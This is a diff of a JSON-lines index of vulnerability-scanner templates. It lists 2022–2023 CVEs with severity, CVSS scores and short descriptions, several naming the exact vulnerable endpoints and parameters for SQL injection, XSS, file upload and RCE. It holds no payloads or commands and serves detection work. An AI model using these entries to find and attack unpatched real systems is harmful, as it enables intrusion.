{"ID":"CVE-2022-26564","Info":{"Name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","Severity":"medium","Description":"HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-26564.yaml"} {"ID":"CVE-2022-26833","Info":{"Name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","Severity":"critical","Description":"An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26833.yaml"} {"ID":"CVE-2022-26960","Info":{"Name":"elFinder \u003c=2.1.60 - Local File Inclusion","Severity":"critical","Description":"elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-26960.yaml"} +{"ID":"CVE-2022-2733","Info":{"Name":"Openemr \u003c 7.0.0.1 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2733.yaml"} {"ID":"CVE-2022-2756","Info":{"Name":"Kavita \u003c0.5.4.1 - Server-Side Request Forgery","Severity":"medium","Description":"Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-2756.yaml"} {"ID":"CVE-2022-27593","Info":{"Name":"QNAP QTS Photo Station External Reference - Local File Inclusion","Severity":"critical","Description":"QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-27593.yaml"} {"ID":"CVE-2022-27849","Info":{"Name":"WordPress Simple Ajax Chat \u003c20220116 - Sensitive Information Disclosure vulnerability","Severity":"high","Description":"WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-27849.yaml"} {"ID":"CVE-2022-27926","Info":{"Name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-27926.yaml"} {"ID":"CVE-2022-27927","Info":{"Name":"Microfinance Management System 1.0 - SQL Injection","Severity":"critical","Description":"Microfinance Management System 1.0 is susceptible to SQL Injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-27927.yaml"} +{"ID":"CVE-2022-27984","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"critical","Description":"CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-27984.yaml"} +{"ID":"CVE-2022-27985","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"critical","Description":"CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-27985.yaml"} +{"ID":"CVE-2022-28022","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-28022.yaml"} +{"ID":"CVE-2022-28023","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-28023.yaml"} {"ID":"CVE-2022-28032","Info":{"Name":"Atom CMS v2.0 - SQL Injection","Severity":"critical","Description":"AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-28032.yaml"} {"ID":"CVE-2022-28079","Info":{"Name":"College Management System 1.0 - SQL Injection","Severity":"high","Description":"College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-28079.yaml"} {"ID":"CVE-2022-28080","Info":{"Name":"Royal Event - SQL Injection","Severity":"high","Description":"Royal Event is vulnerable to a SQL injection vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-28080.yaml"} @@ -1584,6 +1637,17 @@ {"ID":"CVE-2022-31846","Info":{"Name":"WAVLINK WN535 G3 - Information Disclosure","Severity":"high","Description":"WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-31846.yaml"} {"ID":"CVE-2022-31847","Info":{"Name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","Severity":"high","Description":"WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-31847.yaml"} {"ID":"CVE-2022-31854","Info":{"Name":"Codoforum 5.1 - Arbitrary File Upload","Severity":"high","Description":"Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31854.yaml"} +{"ID":"CVE-2022-31879","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-31879.yaml"} +{"ID":"CVE-2022-31974","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports\u0026date=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31974.yaml"} +{"ID":"CVE-2022-31975","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user\u0026id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31975.yaml"} +{"ID":"CVE-2022-31976","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"critical","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31976.yaml"} +{"ID":"CVE-2022-31977","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"critical","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31977.yaml"} +{"ID":"CVE-2022-31978","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"critical","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31978.yaml"} +{"ID":"CVE-2022-31980","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team\u0026id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31980.yaml"} +{"ID":"CVE-2022-31981","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team\u0026id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31981.yaml"} +{"ID":"CVE-2022-31982","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request\u0026id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31982.yaml"} +{"ID":"CVE-2022-31983","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request\u0026id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31983.yaml"} +{"ID":"CVE-2022-31984","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31984.yaml"} {"ID":"CVE-2022-32007","Info":{"Name":"Complete Online Job Search System 1.0 - SQL Injection","Severity":"high","Description":"Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit\u0026id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-32007.yaml"} {"ID":"CVE-2022-32015","Info":{"Name":"Complete Online Job Search System 1.0 - SQL Injection","Severity":"high","Description":"Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category\u0026search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-32015.yaml"} {"ID":"CVE-2022-32018","Info":{"Name":"Complete Online Job Search System 1.0 - SQL Injection","Severity":"high","Description":"Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring\u0026search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-32018.yaml"} @@ -1649,6 +1713,7 @@ {"ID":"CVE-2022-39195","Info":{"Name":"LISTSERV 17 - Cross-Site Scripting","Severity":"medium","Description":"LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the \"c\" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-39195.yaml"} {"ID":"CVE-2022-3933","Info":{"Name":"WordPress Essential Real Estate \u003c3.9.6 - Authenticated Cross-Site Scripting","Severity":"medium","Description":"WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-3933.yaml"} {"ID":"CVE-2022-3934","Info":{"Name":"WordPress FlatPM \u003c3.0.13 - Cross-Site Scripting","Severity":"medium","Description":"WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-3934.yaml"} +{"ID":"CVE-2022-3980","Info":{"Name":"Sophos Mobile managed on-premises - XML External Entity Injection","Severity":"critical","Description":"An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-3980.yaml"} {"ID":"CVE-2022-3982","Info":{"Name":"WordPress Booking Calendar \u003c3.2.2 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-3982.yaml"} {"ID":"CVE-2022-39952","Info":{"Name":"Fortinet FortiNAC - Arbitrary File Write","Severity":"critical","Description":"Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-39952.yaml"} {"ID":"CVE-2022-39960","Info":{"Name":"Jira Netic Group Export \u003c1.0.3 - Missing Authorization","Severity":"medium","Description":"Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-39960.yaml"} @@ -1667,6 +1732,8 @@ {"ID":"CVE-2022-41473","Info":{"Name":"RPCMS 3.0.2 - Cross-Site Scripting","Severity":"medium","Description":"RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-41473.yaml"} {"ID":"CVE-2022-41840","Info":{"Name":"Welcart eCommerce \u003c=2.7.7 - Local File Inclusion","Severity":"critical","Description":"Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-41840.yaml"} {"ID":"CVE-2022-42094","Info":{"Name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","Severity":"medium","Description":"Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2022/CVE-2022-42094.yaml"} +{"ID":"CVE-2022-42095","Info":{"Name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","Severity":"medium","Description":"Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2022/CVE-2022-42095.yaml"} +{"ID":"CVE-2022-42096","Info":{"Name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","Severity":"medium","Description":"Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2022/CVE-2022-42096.yaml"} {"ID":"CVE-2022-42233","Info":{"Name":"Tenda 11N - Authentication Bypass","Severity":"critical","Description":"Tenda 11N with firmware version V5.07.33_cn contains an authentication bypass vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-42233.yaml"} {"ID":"CVE-2022-4260","Info":{"Name":"WordPress WP-Ban \u003c1.69.1 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2022/CVE-2022-4260.yaml"} {"ID":"CVE-2022-42746","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-42746.yaml"} @@ -1684,14 +1751,18 @@ {"ID":"CVE-2022-4320","Info":{"Name":"WordPress Events Calendar \u003c1.4.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4320.yaml"} {"ID":"CVE-2022-4321","Info":{"Name":"PDF Generator for WordPress \u003c 1.1.2 - Cross Site Scripting","Severity":"medium","Description":"The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-4321.yaml"} {"ID":"CVE-2022-4325","Info":{"Name":"WordPress Post Status Notifier Lite \u003c1.10.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4325.yaml"} +{"ID":"CVE-2022-4328","Info":{"Name":"WooCommerce Checkout Field Manager \u003c 18.0 - Arbitrary File Upload","Severity":"critical","Description":"The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4328.yaml"} {"ID":"CVE-2022-43769","Info":{"Name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","Severity":"high","Description":"Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-43769.yaml"} {"ID":"CVE-2022-4447","Info":{"Name":"WordPress Fontsy \u003c=1.8.6 - SQL Injection","Severity":"critical","Description":"WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4447.yaml"} {"ID":"CVE-2022-44877","Info":{"Name":"CentOS Web Panel 7 \u003c0.9.8.1147 - Remote Code Execution","Severity":"critical","Description":"CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-44877.yaml"} +{"ID":"CVE-2022-45037","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45037.yaml"} +{"ID":"CVE-2022-45038","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45038.yaml"} {"ID":"CVE-2022-45362","Info":{"Name":"WordPress Paytm Payment Gateway \u003c=2.7.0 - Server-Side Request Forgery","Severity":"high","Description":"WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-45362.yaml"} {"ID":"CVE-2022-45805","Info":{"Name":"WordPress Paytm Payment Gateway \u003c=2.7.3 - SQL Injection","Severity":"critical","Description":"WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-45805.yaml"} {"ID":"CVE-2022-45835","Info":{"Name":"WordPress PhonePe Payment Solutions \u003c=1.0.15 - Server-Side Request Forgery","Severity":"medium","Description":"WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-45835.yaml"} {"ID":"CVE-2022-45917","Info":{"Name":"ILIAS eLearning \u003c7.16 - Open Redirect","Severity":"medium","Description":"ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-45917.yaml"} {"ID":"CVE-2022-45933","Info":{"Name":"KubeView \u003c=0.1.31 - Information Disclosure","Severity":"critical","Description":"KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-45933.yaml"} +{"ID":"CVE-2022-46020","Info":{"Name":"WBCE CMS v1.5.4 - Remote Code Execution","Severity":"critical","Description":"WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46020.yaml"} {"ID":"CVE-2022-46169","Info":{"Name":"Cacti \u003c=1.2.22 - Remote Command Injection","Severity":"critical","Description":"Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46169.yaml"} {"ID":"CVE-2022-46381","Info":{"Name":"Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46381.yaml"} {"ID":"CVE-2022-46888","Info":{"Name":"NexusPHP \u003c1.7.33 - Cross-Site Scripting","Severity":"medium","Description":"NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks..\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46888.yaml"} @@ -1708,20 +1779,31 @@ {"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"} {"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"} {"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"} +{"ID":"CVE-2023-0630","Info":{"Name":"Slimstat Analytics \u003c 4.9.3.3 Subscriber - SQL Injection","Severity":"high","Description":"The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0630.yaml"} {"ID":"CVE-2023-0669","Info":{"Name":"Fortra GoAnywhere MFT - Remote Code Execution","Severity":"high","Description":"Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0669.yaml"} {"ID":"CVE-2023-0942","Info":{"Name":"WordPress Japanized for WooCommerce \u003c2.5.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0942.yaml"} +{"ID":"CVE-2023-0948","Info":{"Name":"WordPress Japanized for WooCommerce \u003c2.5.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Japanized for WooCommerce plugin before 2.5.8 is 